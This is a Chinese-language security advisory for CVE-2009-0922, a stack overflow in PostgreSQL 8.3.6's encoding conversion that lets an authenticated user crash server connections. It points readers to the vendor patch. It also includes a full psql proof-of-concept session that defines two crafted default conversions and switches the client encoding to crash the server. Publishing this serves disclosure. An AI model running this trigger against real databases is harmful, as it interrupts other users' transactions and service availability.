BUGTRAQ ID: 34090
CVE(CAN) ID: CVE-2009-0922
PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。
PostgreSQL处理转换编码时存在栈溢出漏洞,通过认证的用户可以通过提交特制的SQL查询请求在一段时间期间杀死到PostgreSQL服务器的连接,中断其他用户和客户端的事务处理。
PostgreSQL 8.3.6
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.postgresql.org” target=“_blank”>http://www.postgresql.org</a>
=cut=
postgres(at)sunset:~$ createdb test -E KOI8
postgres(at)sunset:~$ psql test
Welcome to psql 8.3.6, the PostgreSQL interactive terminal.
Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help with psql commands
\\g or terminate with semicolon to execute query
\\q to quit
test=# SHOW server_version;
server_version
----------------
8.3.6
(1 row)
test=# CREATE DEFAULT CONVERSION test1 FOR \'LATIN1\' TO \'KOI8\' FROM
ascii_to_mic;
CREATE CONVERSION
test=# CREATE DEFAULT CONVERSION test2 FOR \'KOI8\' TO \'LATIN1\' FROM
mic_to_ascii;
CREATE CONVERSION
test=# set client_encoding to \'LATIN1\';
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
Соединение с сервером было потеряно.
Попытка переустановить: Безуспешно.
!> \\q
=end cut=